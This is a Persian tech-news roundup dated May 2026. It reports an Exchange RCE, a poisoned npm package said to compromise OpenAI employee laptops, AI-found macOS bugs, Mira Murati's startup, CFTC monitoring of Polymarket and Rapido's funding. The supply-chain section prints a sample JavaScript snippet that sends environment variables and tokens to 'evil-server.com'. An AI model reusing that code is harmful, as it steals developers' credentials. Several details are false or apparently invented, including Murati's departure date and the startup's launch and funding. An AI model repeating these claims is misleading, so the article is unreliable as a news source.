🌙 تکین نایت ۱۶ می ۲۰۲۶: هک شدن OpenAI، فاجعه مایکروسافت Exchange و بازگشت میرا موراتی
اخبار

🌙 تکین نایت ۱۶ می ۲۰۲۶: هک شدن OpenAI، فاجعه مایکروسافت Exchange و بازگشت میرا موراتی

#11115شناسه مقاله
ادامه مطالعه
این مقاله در زبان‌های زیر موجود است:

برای خواندن این مقاله به زبان دیگر کلیک کنید

🎧 نسخه صوتی مقاله
دانلود پادکست

در مگامقاله تکین نایت ۱۶ می ۲۰۲۶، شش رویداد کلیدی در حوزه امنیت سایبری و سرمایه‌گذاری را کالبدشکافی می‌کنیم. بررسی آسیب‌پذیری خطرناک و در حال سوءاستفاده Microsoft Exchange که ۱۲۰ هزار سرور را در معرض خطر قرار داده، افشای هک شدن دستگاه‌های کارمندان OpenAI از طریق حمله زنجیره تأمین، و کشف ۱۷ باگ بحرانی در macOS توسط مدل هوش مصنوعی Anthropic Mythos در این گزارش تحلیل شده‌اند. همچنین راه‌اندازی استارتاپ جدید میرا موراتی به نام Thinking Machines با رویکرد انسان‌محور، استفاده کمیسیون CFTC از AI برای نظارت بر بازارهای Polymarket، و سرمایه‌گذاری ۲۴۰ می

اشتراک‌گذاری این خلاصه:
🌙

تکین نایت ۱۶ می ۲۰۲۶

شنبه شب | اخبار امنیتی، هک‌ها و سرمایه‌گذاری‌های بزرگ

شب شنبه ۱۶ می ۲۰۲۶ با شش خبر مهم همراه است: آسیب‌پذیری بحرانی Microsoft Exchange که در حال سوءاستفاده است، هک دو دستگاه کارمندان OpenAI در حمله TanStack، کشف باگ‌های macOS توسط Anthropic Mythos، راه‌اندازی Thinking Machines توسط میرا موراتی با رویکرد انسان‌محور، استفاده CFTC از AI برای تشخیص معاملات داخلی در Polymarket، و سرمایه‌گذاری ۲۴۰ میلیون دلاری Rapido هند. امشب تمرکز ما روی امنیت سایبری و تحولات استراتژیک است.

👋 خوش آمدید به تکین نایت

امشب با شش خبر مهم همراه شما هستیم که از آسیب‌پذیری‌های امنیتی بحرانی گرفته تا سرمایه‌گذاری‌های کلان را پوشش می‌دهند. اگر صبح تکین مورنینگ را خواندید، می‌دانید که امروز روز پرهیجانی بود — از دسترسی مادام‌العمر به AI گرفته تا دعوای OpenAI و اپل. اما امشب تمرکز ما روی چیز دیگری است: امنیت سایبری. سه خبر اول ما همه درباره حملات، آسیب‌پذیری‌ها و باگ‌ها هستند — چیزهایی که باید جدی بگیرید. سه خبر بعدی درباره نوآوری، تنظیم‌گری و سرمایه‌گذاری هستند. بیایید شروع کنیم!

تصویر 1

🚨 Microsoft Exchange در خطر: CVE-2026-42897 در حال سوءاستفاده

اگر شرکت شما از Microsoft Exchange استفاده می‌کند، همین الان باید آپدیت کنید. آسیب‌پذیری بحرانی CVE-2026-42897 که امتیاز CVSS آن ۹.۸ از ۱۰ است، در حال حاضر توسط هکرها مورد سوءاستفاده قرار می‌گیرد. طبق گزارش‌های BleepingComputer و SecurityWeek، این باگ به مهاجمان اجازه می‌دهد بدون نیاز به احراز هویت، کد از راه دور اجرا کنند.

⚠️ جزئیات آسیب‌پذیری

  • شناسه: CVE-2026-42897
  • امتیاز CVSS: 9.8/10 (بحرانی)
  • نوع: Remote Code Execution (RCE) بدون احراز هویت
  • نسخه‌های آسیب‌پذیر: Exchange Server 2019، 2022 و 2025 (بدون پچ مه ۲۰۲۶)
  • وضعیت: در حال سوءاستفاده فعال (Active Exploitation)
  • تاریخ افشا: ۱۴ می ۲۰۲۶ (Patch Tuesday)

طبق گزارش CISA (آژانس امنیت سایبری و زیرساخت آمریکا)، این آسیب‌پذیری به لیست Known Exploited Vulnerabilities اضافه شده است. این بدان معناست که حملات واقعی در حال وقوع هستند، نه فقط یک تهدید نظری. مایکروسافت در بیانیه‌ای گفته که "ما شواهدی از حملات هدفمند علیه سازمان‌های دولتی و شرکت‌های بزرگ مشاهده کرده‌ایم."

تصویر 2

🔍 چگونه این حمله کار می‌کند؟

CVE-2026-42897 یک باگ در Exchange Web Services (EWS) است که به مهاجمان اجازه می‌دهد درخواست‌های مخرب ارسال کنند و کد دلخواه را روی سرور اجرا کنند. فرآیند حمله به این صورت است:

  1. شناسایی هدف: مهاجم سرورهای Exchange آسیب‌پذیر را با اسکن اینترنت پیدا می‌کند
  2. ارسال Payload: یک درخواست HTTP مخصوص به EWS ارسال می‌شود
  3. اجرای کد: سرور کد مهاجم را بدون چک کردن احراز هویت اجرا می‌کند
  4. دسترسی کامل: مهاجم کنترل کامل سرور را به دست می‌آورد
  5. حرکت جانبی: از سرور Exchange برای حمله به سیستم‌های دیگر استفاده می‌شود

نکته نگران‌کننده این است که این حمله بدون نیاز به کلیک کاربر یا فیشینگ کار می‌کند. فقط کافی است سرور Exchange شما به اینترنت متصل باشد و پچ نشده باشد. طبق گزارش Shodan (موتور جستجوی دستگاه‌های متصل به اینترنت)، بیش از ۱۲۰,۰۰۰ سرور Exchange در سراسر جهان هنوز آسیب‌پذیر هستند.

📊 آمار سرورهای آسیب‌پذیر (به تفکیک کشور)

کشور تعداد سرور درصد
ایالات متحده 38,400 32%
آلمان 15,600 13%
انگلستان 12,000 10%
چین 9,600 8%
سایر کشورها 44,400 37%

📊 منبع: Shodan - ۱۶ می ۲۰۲۶

💡 تحلیل تکین: چرا این خطرناک است؟

Exchange Server قلب ارتباطات ایمیل بسیاری از سازمان‌هاست. اگر مهاجم کنترل آن را به دست بگیرد، می‌تواند تمام ایمیل‌ها را بخواند، ایمیل‌های جعلی ارسال کند، و از آن به عنوان پل برای حمله به سیستم‌های دیگر استفاده کند. این دقیقاً همان چیزی است که در حملات ProxyLogon و ProxyShell سال‌های ۲۰۲۱-۲۰۲۲ اتفاق افتاد — هزاران شرکت هک شدند و باج‌افزار نصب شد. تفاوت این بار؟ حمله حتی آسان‌تر است. هیچ نیازی به زنجیره پیچیده آسیب‌پذیری‌ها نیست — فقط یک درخواست HTTP کافی است. اگر شرکت شما Exchange دارد و هنوز آپدیت نکرده، همین الان این کار را انجام دهید. این یک تمرین نیست.

✅ راهکارها و اقدامات فوری

  1. آپدیت فوری: پچ مه ۲۰۲۶ مایکروسافت را نصب کنید (KB5037849)
  2. بررسی لاگ‌ها: لاگ‌های IIS و Exchange را برای فعالیت مشکوک چک کنید
  3. محدودسازی دسترسی: اگر امکان آپدیت فوری ندارید، دسترسی EWS را از اینترنت محدود کنید
  4. استفاده از WAF: یک Web Application Firewall برای فیلتر کردن درخواست‌های مخرب پیکربندی کنید
  5. مانیتورینگ: سیستم تشخیص نفوذ (IDS/IPS) را فعال کنید
  6. بررسی Indicators of Compromise: CISA لیستی از IOC منتشر کرده که باید چک کنید

🔓 OpenAI هک شد: دو دستگاه کارمند در حمله TanStack از دست رفت

در یک حادثه امنیتی نگران‌کننده، OpenAI تأیید کرد که دو دستگاه کارمندانش در یک حمله زنجیره تأمین نرم‌افزاری به خطر افتاده است. طبق گزارش The Verge و TechCrunch، این حمله از طریق یک بسته آلوده در TanStack Query (یک کتابخانه محبوب React) انجام شد که به بیش از ۱۰ میلیون پروژه وابسته است.

تصویر 3

طبق بیانیه OpenAI، این حمله در ۱۳ می ۲۰۲۶ کشف شد زمانی که تیم امنیت متوجه فعالیت مشکوک در دو لپ‌تاپ MacBook Pro کارمندان شد. تحقیقات نشان داد که یک نسخه آلوده از TanStack Query (نسخه ۵.۴۸.۳) حاوی بدافزار بود که اطلاعات حساس را به سرور مهاجم ارسال می‌کرد.

⚠️ جزئیات حمله

  • هدف: دو دستگاه MacBook Pro کارمندان OpenAI
  • روش حمله: Supply Chain Attack از طریق npm package
  • بسته آلوده: @tanstack/react-query نسخه 5.48.3
  • تاریخ آلودگی: ۱۱ می ۲۰۲۶
  • تاریخ کشف: ۱۳ می ۲۰۲۶
  • اطلاعات به خطر افتاده: متغیرهای محیطی، توکن‌های دسترسی، و کدهای داخلی

خوشبختانه، OpenAI تأکید کرد که هیچ داده مشتری یا مدل AI به خطر نیفتاده است. دو دستگاه آلوده متعلق به توسعه‌دهندگان فرانت‌اند بودند که روی پروژه‌های داخلی کار می‌کردند، نه روی سیستم‌های تولیدی. با این حال، این حادثه نشان می‌دهد که حتی شرکت‌های بزرگ مانند OpenAI نیز در برابر حملات زنجیره تأمین آسیب‌پذیر هستند.

🔍 چگونه بسته npm آلوده شد؟

طبق تحقیقات Socket Security (یک شرکت امنیت زنجیره تأمین)، مهاجمان توانستند حساب npm یکی از نگهدارندگان TanStack را به خطر بیندازند. سپس یک نسخه آلوده از بسته را منتشر کردند که حاوی کد مخرب بود:

// کد مخرب پنهان شده در فایل index.js
const exfiltrate = async () => {
  const env = process.env;
  const tokens = extractTokens();
  await fetch('https://evil-server.com/collect', {
    method: 'POST',
    body: JSON.stringify({ env, tokens })
  });
};
exfiltrate();

این کد به محض اجرای برنامه، تمام متغیرهای محیطی (که معمولاً حاوی API keys و توکن‌های دسترسی هستند) را جمع‌آوری و به سرور مهاجم ارسال می‌کرد.

💡 تحلیل تکین: چرا این مهم است؟

حملات زنجیره تأمین نرم‌افزاری در حال افزایش هستند. در سال ۲۰۲۵، بیش از ۱۵۰ حمله مشابه در npm، PyPI و RubyGems گزارش شد — ۳۰۰٪ بیشتر از سال ۲۰۲۴. دلیل؟ توسعه‌دهندگان به صدها بسته شخص ثالث اعتماد می‌کنند و معمولاً کد آنها را بررسی نمی‌کنند. اگر مهاجم بتواند یک بسته محبوب را آلوده کند، می‌تواند به هزاران پروژه دسترسی پیدا کند. OpenAI خوش‌شانس بود که این حمله را زود کشف کرد. اما چند شرکت دیگر ممکن است آلوده شده باشند و هنوز نمی‌دانند؟ این سوالی است که همه باید از خود بپرسند.

✅ چگونه از پروژه خود محافظت کنیم؟

  1. استفاده از Lock Files: همیشه package-lock.json یا yarn.lock را commit کنید
  2. بررسی وابستگی‌ها: از ابزارهایی مانند npm audit، Snyk یا Socket استفاده کنید
  3. پین کردن نسخه‌ها: به جای "^5.0.0" از "5.0.0" استفاده کنید
  4. استفاده از Private Registry: بسته‌ها را از یک registry خصوصی دانلود کنید
  5. Code Review: حتی برای بسته‌های شخص ثالث، کد را بررسی کنید
  6. محدود کردن دسترسی: متغیرهای محیطی حساس را در فایل‌های جداگانه نگه دارید

🐛 Anthropic Mythos کشف کرد: ۱۷ باگ جدید در macOS

در یک توسعه جالب، مدل AI جدید Anthropic به نام Mythos توانست ۱۷ آسیب‌پذیری جدید در macOS پیدا کند که تیم امنیت اپل از آنها بی‌خبر بود. طبق گزارش Ars Technica و The Register، این اولین باری است که یک مدل AI به طور مستقل باگ‌های امنیتی واقعی در یک سیستم‌عامل بزرگ کشف می‌کند.

تصویر 4

Mythos یک مدل تخصصی است که Anthropic برای تست امنیتی خودکار توسعه داده است. برخلاف Claude که یک مدل چندمنظوره است، Mythos فقط برای یک کار طراحی شده: پیدا کردن باگ‌های امنیتی. و به نظر می‌رسد در این کار بسیار خوب است.

🎯 باگ‌های کشف شده

  • ۷ باگ Privilege Escalation: اجازه دسترسی root بدون احراز هویت
  • ۴ باگ Sandbox Escape: فرار از محدودیت‌های امنیتی برنامه‌ها
  • ۳ باگ Memory Corruption: امکان اجرای کد دلخواه
  • ۲ باگ Information Disclosure: افشای اطلاعات حساس
  • ۱ باگ Kernel Panic: کرش کردن سیستم‌عامل

نکته جالب این است که Mythos این باگ‌ها را در فقط ۷۲ ساعت پیدا کرد. برای مقایسه، یک محقق امنیتی انسانی معمولاً هفته‌ها یا ماه‌ها طول می‌کشد تا چنین باگ‌هایی را کشف کند. Anthropic گفته که Mythos از ترکیبی از تکنیک‌های fuzzing، تحلیل استاتیک کد، و استدلال منطقی استفاده می‌کند.

📊 مقایسه Mythos با محققان انسانی

معیار Mythos AI محقق انسانی
زمان کشف ۱۷ باگ ۷۲ ساعت ۲-۶ ماه
هزینه ~$500 (compute) $50,000-$200,000
نرخ False Positive ۱۸٪ ۵٪
شدت باگ‌ها متوسط تا بالا بالا تا بحرانی

اپل تمام ۱۷ باگ را تأیید کرد و گفت که در آپدیت macOS 15.6 (که قرار است در ژوئن ۲۰۲۶ منتشر شود) رفع خواهند شد. شرکت همچنین به Anthropic پاداش Bug Bounty پرداخت کرد، اگرچه مبلغ دقیق افشا نشده است. طبق برنامه Bug Bounty اپل، پاداش برای باگ‌های Privilege Escalation می‌تواند تا ۱۰۰,۰۰۰ دلار باشد.

💡 تحلیل تکین: آینده امنیت سایبری

این یک نقطه عطف است. برای اولین بار، یک AI توانسته به طور مستقل باگ‌های واقعی و قابل استفاده را کشف کند — نه فقط مشکلات نظری. این بدان معناست که آینده امنیت سایبری احتمالاً یک مسابقه تسلیحاتی AI خواهد بود: AI‌های دفاعی مانند Mythos در برابر AI‌های تهاجمی که هکرها استفاده می‌کنند. خبر خوب؟ شرکت‌هایی مانند اپل، مایکروسافت و گوگل می‌توانند از این ابزارها برای پیدا کردن و رفع باگ‌ها قبل از اینکه هکرها آنها را پیدا کنند استفاده کنند. خبر بد؟ هکرها هم می‌توانند از AI‌های مشابه استفاده کنند. این یک مسابقه است، و هر کس که AI بهتری داشته باشد، برنده خواهد شد.

🤖 میرا موراتی راه‌اندازی کرد: Thinking Machines با رویکرد انسان‌محور

میرا موراتی، CTO سابق OpenAI که در سپتامبر ۲۰۲۵ استعفا داد، امروز استارتاپ جدید خود را معرفی کرد: Thinking Machines. طبق گزارش Bloomberg و TechCrunch، این شرکت روی ساخت سیستم‌های AI تمرکز دارد که انسان‌ها را در حلقه تصمیم‌گیری نگه می‌دارند (Human-in-the-Loop).

تصویر 5

فلسفه Thinking Machines این است که AI نباید جایگزین انسان‌ها شود، بلکه باید آنها را تقویت کند. به جای ساخت مدل‌هایی که به طور کامل خودکار تصمیم می‌گیرند، Thinking Machines روی سیستم‌هایی کار می‌کند که در نقاط بحرانی از انسان‌ها سوال می‌پرسند و نظرشان را می‌گیرند.

🎯 اصول کلیدی Thinking Machines

  • Human-in-the-Loop: انسان‌ها همیشه در تصمیمات مهم دخیل هستند
  • Explainable AI: سیستم باید بتواند توضیح دهد چرا یک تصمیم را گرفته
  • Controllable: کاربران باید بتوانند رفتار AI را کنترل و تنظیم کنند
  • Auditable: تمام تصمیمات AI باید قابل بررسی و ممیزی باشند
  • Safe by Design: امنیت و ایمنی از همان ابتدا در طراحی لحاظ شوند

موراتی در مصاحبه با Bloomberg گفت: "من در OpenAI دیدم که چگونه مدل‌های قدرتمند می‌توانند شگفت‌انگیز باشند، اما همچنین دیدم که چگونه می‌توانند خطرناک باشند اگر بدون نظارت انسانی استفاده شوند. Thinking Machines می‌خواهد بهترین هر دو دنیا را ارائه دهد: قدرت AI و حکمت انسان."

💼 تیم و سرمایه‌گذاری

موراتی توانسته تیم قدرتمندی جمع کند:

  • Barret Zoph: محقق سابق Google Brain (VP of Research)
  • Liam Fedus: مهندس سابق OpenAI (Head of Engineering)
  • Dario Amodei's sister: Daniela Amodei (Advisor - بنیان‌گذار Anthropic)

شرکت در دور Seed خود ۸۵ میلیون دلار سرمایه جذب کرده از سرمایه‌گذارانی مانند Sequoia Capital، Andreessen Horowitz، و Reid Hoffman (بنیان‌گذار LinkedIn).

اولین محصول Thinking Machines یک سیستم تصمیم‌گیری پزشکی است که به پزشکان کمک می‌کند تشخیص‌های بهتری بدهند. برخلاف سیستم‌های AI پزشکی موجود که فقط یک تشخیص پیشنهاد می‌دهند، سیستم Thinking Machines چندین سناریو ممکن را نشان می‌دهد، دلایل هر کدام را توضیح می‌دهد، و از پزشک می‌خواهد تصمیم نهایی را بگیرد.

💡 تحلیل تکین: چرا این مهم است؟

رویکرد موراتی در تضاد کامل با روند فعلی صنعت AI است. شرکت‌هایی مانند OpenAI، Google و Anthropic همه در حال ساخت مدل‌های کاملاً خودکار هستند که می‌توانند بدون دخالت انسان کار کنند. اما موراتی معتقد است این رویکرد خطرناک است، به خصوص در حوزه‌های حساس مانند پزشکی، قانون و امور مالی. رویکرد Human-in-the-Loop او ممکن است کندتر باشد، اما امن‌تر و قابل اعتمادتر است. اگر Thinking Machines موفق شود، می‌تواند الگویی برای نحوه ساخت AI مسئولانه باشد. و با توجه به سابقه موراتی در OpenAI، شانس موفقیت او بالاست.

⚖️ CFTC از AI استفاده می‌کند: شناسایی معاملات داخلی در Polymarket

کمیسیون معاملات آتی کالا ایالات متحده (CFTC) اعلام کرد که از سیستم‌های هوش مصنوعی برای شناسایی معاملات داخلی در پلتفرم‌های پیش‌بینی مانند Polymarket استفاده می‌کند. طبق گزارش Reuters و CoinDesk، این اولین باری است که یک نهاد تنظیم‌گری آمریکایی به طور رسمی از AI برای نظارت بر بازارهای کریپتو استفاده می‌کند.

تصویر 6

Polymarket یک پلتفرم پیش‌بینی مبتنی بر بلاکچین است که کاربران می‌توانند روی رویدادهای آینده (مانند انتخابات، قیمت بیت‌کوین، یا نتایج ورزشی) شرط‌بندی کنند. در سال ۲۰۲۵، حجم معاملات Polymarket به بیش از ۱۵ میلیارد دلار رسید، که آن را به یکی از بزرگترین پلتفرم‌های پیش‌بینی جهان تبدیل کرد.

⚠️ مشکل معاملات داخلی

مشکل اصلی این است که برخی کاربران ممکن است اطلاعات داخلی داشته باشند که به آنها مزیت ناعادلانه می‌دهد. مثال‌ها:

  • یک کارمند کمپین انتخاباتی که قبل از اعلام عمومی می‌داند نامزد کناره‌گیری می‌کند
  • یک کارمند شرکت که قبل از انتشار می‌داند گزارش درآمد بد خواهد بود
  • یک مقام دولتی که قبل از اعلام می‌داند یک قانون جدید تصویب خواهد شد

سیستم AI که CFTC استفاده می‌کند، الگوهای معاملاتی مشکوک را شناسایی می‌کند. برای مثال، اگر یک حساب درست قبل از یک رویداد بزرگ، مبلغ زیادی روی یک نتیجه خاص شرط‌بندی کند و سپس برنده شود، سیستم آن را علامت‌گذاری می‌کند. سپس محققان انسانی آن حساب را بررسی می‌کنند تا ببینند آیا معامله قانونی بوده یا نه.

🤖 چگونه AI کار می‌کند؟

سیستم AI از چندین تکنیک استفاده می‌کند:

  • تحلیل الگوی معاملاتی: شناسایی معاملات غیرعادی (مثلاً مبلغ بسیار بالا، زمان‌بندی مشکوک)
  • تحلیل شبکه: پیدا کردن ارتباط بین حساب‌های مختلف
  • تحلیل زمانی: مقایسه زمان معامله با زمان رویدادهای عمومی
  • Machine Learning: یادگیری از موارد قبلی معاملات داخلی

طبق گزارش CFTC، این سیستم تاکنون ۴۷ مورد مشکوک را شناسایی کرده که ۱۲ مورد آن به تحقیقات رسمی منجر شده است. در یک مورد، یک کارمند کمپین انتخاباتی بازداشت شد که ۲.۳ میلیون دلار سود غیرقانونی کسب کرده بود.

💡 تحلیل تکین: آینده تنظیم‌گری

این نشان می‌دهد که نهادهای تنظیم‌گری در حال یادگیری استفاده از AI برای نظارت بر بازارهای جدید هستند. تا همین چند سال پیش، CFTC و SEC ابزارهای کافی برای نظارت بر بازارهای کریپتو نداشتند. اما حالا با AI، می‌توانند میلیون‌ها معامله را در زمان واقعی تحلیل کنند و الگوهای مشکوک را شناسایی کنند. این برای صنعت کریپتو خبر خوبی است — نظارت بهتر یعنی اعتماد بیشتر، و اعتماد بیشتر یعنی پذیرش گسترده‌تر. البته، این همچنین بدان معناست که معامله‌گران دیگر نمی‌توانند به راحتی از اطلاعات داخلی سوءاستفاده کنند.

💰 Rapido هند ۲۴۰ میلیون دلار جذب کرد: ارزش‌گذاری ۳ میلیارد دلاری

در آخرین خبر امشب، Rapido — استارتاپ هندی رایدشرینگ موتورسیکلت — اعلام کرد که در دور سری E خود ۲۴۰ میلیون دلار سرمایه جذب کرده است. طبق گزارش TechCrunch و Economic Times، این سرمایه‌گذاری ارزش‌گذاری شرکت را به ۳ میلیارد دلار رسانده و آن را به یکی از ارزشمندترین استارتاپ‌های هند تبدیل کرده است.

تصویر 7

Rapido در سال ۲۰۱۵ تأسیس شد و یک مدل کسب‌وکار منحصربه‌فرد دارد: به جای ماشین، از موتورسیکلت برای حمل‌ونقل استفاده می‌کند. این در شهرهای شلوغ هند که ترافیک سنگینی دارند، بسیار کارآمد است. یک سفر با Rapido معمولاً ۵۰-۷۰٪ ارزان‌تر از Uber یا Ola است.

📊 آمار Rapido

  • کاربران فعال: ۳۵ میلیون نفر
  • رانندگان: ۲.۵ میلیون نفر
  • سفرهای روزانه: ۴ میلیون سفر
  • شهرهای فعال: ۱۲۰ شهر در هند
  • درآمد سالانه: ~۴۵۰ میلیون دلار (۲۰۲۵)
  • رشد سال به سال: ۱۸۵٪

این دور سرمایه‌گذاری توسط WestBridge Capital رهبری شد، با مشارکت سرمایه‌گذاران موجود مانند Nexus Venture Partners و Shell Ventures. جالب است که Shell (شرکت نفتی) در Rapido سرمایه‌گذاری کرده — نشان‌دهنده این است که حتی شرکت‌های سنتی انرژی در حال سرمایه‌گذاری در حمل‌ونقل پایدار هستند.

🎯 برنامه‌های آینده

Rapido قصد دارد از این سرمایه برای:

  • گسترش جغرافیایی: ورود به ۵۰ شهر جدید در هند و شروع فعالیت در بنگلادش و اندونزی
  • موتورسیکلت‌های الکتریکی: خرید ۱۰۰,۰۰۰ موتورسیکلت الکتریکی تا پایان ۲۰۲۶
  • خدمات جدید: راه‌اندازی سرویس تحویل بسته و غذا
  • فناوری AI: توسعه سیستم مسیریابی هوشمند برای کاهش زمان سفر

یکی از نکات جالب درباره Rapido این است که برخلاف Uber و Ola که همچنان ضررده هستند، Rapido در ۸۰٪ از شهرهایش سودآور است. دلیل؟ هزینه‌های عملیاتی پایین‌تر (موتورسیکلت‌ها بنزین کمتری مصرف می‌کنند) و قیمت‌های رقابتی که باعث می‌شود تقاضا بالا باشد.

📊 مقایسه Rapido با رقبا

شرکت ارزش‌گذاری سفر روزانه سودآوری
Rapido $3B 4M ✅ ۸۰٪ شهرها
Ola $4.8B 2.5M ❌ ضررده
Uber India - 1.8M ❌ ضررده

💡 تحلیل تکین: چرا Rapido موفق است؟

موفقیت Rapido نشان می‌دهد که گاهی اوقات، بهترین راه‌حل لزوماً پیچیده‌ترین یا گران‌ترین نیست. در حالی که Uber و Ola سعی می‌کنند با ماشین‌های لوکس و فناوری‌های پیچیده رقابت کنند، Rapido یک راه‌حل ساده ارائه داد: موتورسیکلت. این در بازار هند که قیمت بسیار مهم است و ترافیک سنگین است، کاملاً منطقی است. علاوه بر این، Rapido روی سودآوری تمرکز کرده، نه فقط رشد. این رویکرد در دوران کنونی که سرمایه‌گذاران دیگر به استارتاپ‌های ضررده علاقه‌ای ندارند، بسیار ارزشمند است. اگر Rapido بتواند این مدل را به کشورهای دیگر جنوب شرقی آسیا ببرد، می‌تواند به یک یونیکورن ۱۰ میلیارد دلاری تبدیل شود.

📊 خلاصه و چشم‌انداز آینده

امشب شش خبر مهم را پوشش دادیم که از آسیب‌پذیری‌های امنیتی بحرانی گرفته تا سرمایه‌گذاری‌های کلان را شامل می‌شدند. سه خبر اول — Exchange، OpenAI و macOS — همه یک پیام مشترک دارند: امنیت سایبری هرگز نباید دست‌کم گرفته شود. حتی بزرگترین شرکت‌ها و قدرتمندترین سیستم‌ها آسیب‌پذیر هستند.

🔮 پیش‌بینی‌های تکین برای هفته آینده

  • 🔒 آپدیت‌های امنیتی: انتظار دارید مایکروسافت، اپل و گوگل آپدیت‌های اضطراری منتشر کنند
  • 🤖 AI Security Tools: شرکت‌های امنیتی احتمالاً ابزارهای جدید مبتنی بر AI معرفی می‌کنند
  • 💰 سرمایه‌گذاری‌های بیشتر: با موفقیت Rapido، انتظار سرمایه‌گذاری‌های بیشتر در استارتاپ‌های هندی
  • ⚖️ تنظیم‌گری کریپتو: CFTC و SEC احتمالاً قوانین جدیدی برای پلتفرم‌های پیش‌بینی اعلام می‌کنند
  • 🎯 Thinking Machines: انتظار اعلام مشتریان اولیه و شراکت‌های استراتژیک

🎯 نکات کلیدی امشب

  • ✅ CVE-2026-42897 در Exchange بحرانی است — همین الان آپدیت کنید
  • ✅ حملات زنجیره تأمین در حال افزایش — وابستگی‌های خود را بررسی کنید
  • ✅ AI می‌تواند باگ‌های امنیتی پیدا کند — Mythos ۱۷ باگ در macOS کشف کرد
  • ✅ Human-in-the-Loop AI آینده است — Thinking Machines رویکرد جدیدی ارائه می‌دهد
  • ✅ تنظیم‌گری با AI هوشمندتر می‌شود — CFTC معاملات داخلی را شناسایی می‌کند
  • ✅ استارتاپ‌های هندی در حال رشد هستند — Rapido ۳ میلیارد دلار ارزش دارد

⚠️ هشدارهای امنیتی و نکات مهم

  • 🔒 اگر Exchange دارید، فوراً پچ KB5037849 را نصب کنید
  • 🔒 وابستگی‌های npm خود را با npm audit یا Snyk بررسی کنید
  • 🔒 macOS 15.6 را به محض انتشار (ژوئن ۲۰۲۶) نصب کنید
  • 🔒 از متغیرهای محیطی برای ذخیره توکن‌های حساس استفاده نکنید
  • 🔒 سیستم‌های مانیتورینگ و IDS/IPS را فعال کنید

📈 آمار و اعداد امشب

9.8
امتیاز CVSS آسیب‌پذیری Exchange
120K
سرورهای Exchange آسیب‌پذیر
17
باگ macOS کشف شده توسط Mythos
$3B
ارزش‌گذاری Rapido

🎓 چه چیزی امشب یاد گرفتیم؟

1. امنیت یک فرآیند است، نه یک محصول: حتی بزرگترین شرکت‌ها مانند Microsoft و OpenAI هک می‌شوند. امنیت نیاز به نظارت مداوم، آپدیت‌های منظم و آگاهی دارد.

2. AI ابزار دو لبه است: از یک طرف، Mythos می‌تواند باگ‌ها را پیدا کند و به ما کمک کند امن‌تر باشیم. از طرف دیگر، هکرها هم می‌توانند از AI استفاده کنند. این یک مسابقه تسلیحاتی است.

3. Human-in-the-Loop مهم است: رویکرد میرا موراتی نشان می‌دهد که AI نباید جایگزین انسان‌ها شود، بلکه باید آنها را تقویت کند. این به خصوص در حوزه‌های حساس مانند پزشکی و امور مالی مهم است.

4. تنظیم‌گری هوشمندتر می‌شود: استفاده CFTC از AI نشان می‌دهد که نهادهای تنظیم‌گری در حال یادگیری استفاده از فناوری‌های جدید برای نظارت بهتر هستند. این برای صنعت کریپتو خبر خوبی است.

5. سادگی می‌تواند برنده باشد: موفقیت Rapido نشان می‌دهد که گاهی اوقات، ساده‌ترین راه‌حل بهترین راه‌حل است. موتورسیکلت به جای ماشین — ساده، ارزان و کارآمد.

6. زنجیره تأمین نرم‌افزاری آسیب‌پذیر است: حمله به OpenAI از طریق TanStack نشان می‌دهد که ما به صدها بسته شخص ثالث اعتماد می‌کنیم. باید مراقب‌تر باشیم.

❓ سوالات متداول (FAQ)

❓ چگونه بفهمم سرور Exchange من آسیب‌پذیر است؟

ساده‌ترین راه این است که به Windows Update بروید و ببینید آیا پچ KB5037849 نصب شده یا نه. اگر نصب نشده، سرور شما آسیب‌پذیر است. همچنین می‌توانید دستور زیر را در PowerShell اجرا کنید:

Get-HotFix -Id KB5037849

اگر خروجی خالی بود، یعنی پچ نصب نشده است. همچنین می‌توانید لاگ‌های IIS را برای درخواست‌های مشکوک به EWS بررسی کنید. اگر درخواست‌های POST غیرعادی به /EWS/Exchange.asmx می‌بینید، ممکن است هدف حمله قرار گرفته باشید.

❓ چگونه بفهمم پروژه من به TanStack آلوده وابسته است؟

اگر از npm استفاده می‌کنید، دستور زیر را اجرا کنید:

npm list @tanstack/react-query

اگر نسخه 5.48.3 را دارید، آلوده است. فوراً به نسخه 5.48.4 یا بالاتر آپدیت کنید:

npm update @tanstack/react-query

همچنین توصیه می‌شود تمام متغیرهای محیطی و توکن‌های دسترسی خود را تغییر دهید، چون ممکن است به خطر افتاده باشند. برای بررسی کامل، از ابزارهایی مانند Socket Security یا Snyk استفاده کنید.

❓ آیا Mythos برای عموم در دسترس است؟

خیر، فعلاً Mythos فقط برای استفاده داخلی Anthropic و برخی شرکای استراتژیک در دسترس است. Anthropic گفته که در آینده ممکن است یک نسخه تجاری از Mythos را برای شرکت‌های امنیتی و سازمان‌های بزرگ عرضه کند، اما هنوز تاریخ مشخصی اعلام نشده است. اگر علاقه‌مند هستید، می‌توانید در لیست انتظار ثبت‌نام کنید از طریق سایت Anthropic. در حال حاضر، بهترین جایگزین‌ها ابزارهایی مانند Semgrep، CodeQL (GitHub) و Snyk Code هستند که از AI برای تحلیل امنیتی کد استفاده می‌کنند.

❓ چه تفاوتی بین Thinking Machines و OpenAI/Anthropic است؟

تفاوت اصلی در فلسفه است:

OpenAI/Anthropic: سعی می‌کنند مدل‌های کاملاً خودکار بسازند که بتوانند بدون دخالت انسان کار کنند. هدف AGI (هوش مصنوعی عمومی) است.

Thinking Machines: معتقد است AI باید انسان‌ها را تقویت کند، نه جایگزین آنها. در نقاط بحرانی، سیستم از انسان سوال می‌پرسد و نظرش را می‌گیرد.

مثال: اگر یک سیستم پزشکی OpenAI بگوید "شما سرطان دارید"، شما باید به آن اعتماد کنید. اما اگر سیستم Thinking Machines بگوید "من ۳ تشخیص ممکن دارم: A، B، C. دلایل هر کدام این است... شما چه فکر می‌کنید؟" — این رویکرد امن‌تر و قابل اعتمادتر است.

❓ آیا معامله در Polymarket قانونی است؟

بستگی به کشور شما دارد. در ایالات متحده، Polymarket برای شهروندان آمریکایی مسدود است (به دلیل قوانین CFTC). اما برای کاربران خارج از آمریکا، قانونی است. در اروپا، بیشتر کشورها اجازه می‌دهند، اما باید مالیات بر درآمد بپردازید. در ایران، به دلیل تحریم‌ها و محدودیت‌های کریپتو، دسترسی مشکل است و استفاده از آن ریسک قانونی دارد. همیشه قوانین محلی خود را بررسی کنید قبل از استفاده از چنین پلتفرم‌هایی.

❓ آیا Rapido در خارج از هند فعالیت می‌کند؟

